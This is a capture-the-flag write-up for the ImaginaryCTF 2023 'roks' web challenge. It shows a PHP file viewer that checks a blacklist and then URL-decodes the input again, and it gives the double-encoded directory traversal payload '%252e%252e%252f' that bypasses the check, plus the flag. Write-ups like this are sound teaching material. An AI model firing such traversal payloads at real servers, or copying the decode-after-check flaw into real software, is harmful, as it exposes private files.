2023 ImaginaryCTF - roks

  • Points: 100

Description

My rock enthusiast friend made a website to show off some of his pictures. Could you do something with it?

Attached

roks.zip

Analysis

Check the Dockerfile first:

FROM php:8-apache

RUN /usr/sbin/useradd -u 1000 user

COPY index.php /var/www/html/
COPY file.php /var/www/html/
COPY styles.css /var/www/html/
COPY stopHacking.png /var/www/html/

RUN mkdir /var/www/html/images
COPY images/* /var/www/html/images
COPY flag.png /

VOLUME /var/log/apache2
VOLUME /var/run/apache2

CMD bash -c 'source /etc/apache2/envvars && APACHE_RUN_USER=user APACHE_RUN_GROUP=user /usr/sbin/apache2 -D FOREGROUND'

So the flag is at the filesystem root (/flag.png), and the site is served from /var/www/html/.

Check index.php; the image is fetched with:
xhr.open("GET", "file.php?file=" + randomImageName, true);

Then file.php:
<?php
  // first decode, then the blacklist check
  $filename = urldecode($_GET["file"]);
  if (str_contains($filename, "/") or str_contains($filename, ".")) {
    $contentType = mime_content_type("stopHacking.png");
    header("Content-type: $contentType");
    readfile("stopHacking.png");
  } else {
    // second decode, after the check has already passed
    $filePath = "images/" . urldecode($filename);
    $contentType = mime_content_type($filePath);
    header("Content-type: $contentType");
    readfile($filePath);
  }
?>

So we need directory traversal, but the check rejects any dot "." or slash "/" in the filename.

Also, a single layer of URL encoding, like

%2e%2e%2f

will not work, because the input is decoded before the check runs:

$filename = urldecode($_GET["file"]);

The filename is then decoded a second time when the path is built, so anything that survives the check is decoded once more before readfile().

Solution

Encoding once fails, so encode twice:

%252e%252e%252f

The flag is:

ictf{tr4nsv3rs1ng_0v3r_r0k5_6a3367}

This post is licensed under CC BY 4.0 by the author.